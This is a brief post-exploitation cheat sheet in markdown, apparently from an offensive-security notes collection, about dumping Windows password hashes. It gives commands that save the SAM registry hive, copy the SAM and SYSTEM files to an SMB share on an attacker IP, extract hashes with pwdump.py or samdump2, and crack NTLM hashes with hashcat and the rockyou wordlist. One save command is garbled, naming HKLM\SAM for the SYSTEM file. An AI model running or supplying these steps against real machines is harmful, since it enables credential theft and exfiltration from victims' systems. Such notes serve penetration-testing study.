killchain-compendium/post exploitation/docs/powershell.md

528 B

Powershell

HashDump

save HKLM\SAM C:\Users\Administrator\Desktop\SAM
save HKLM\SAM C:\Users\Administrator\Desktop\System
  • Use samdump2

Extract Hashes

  • Extract via smb server on attacker
copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
python pwdump.py SYSTEM SAM

or

hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt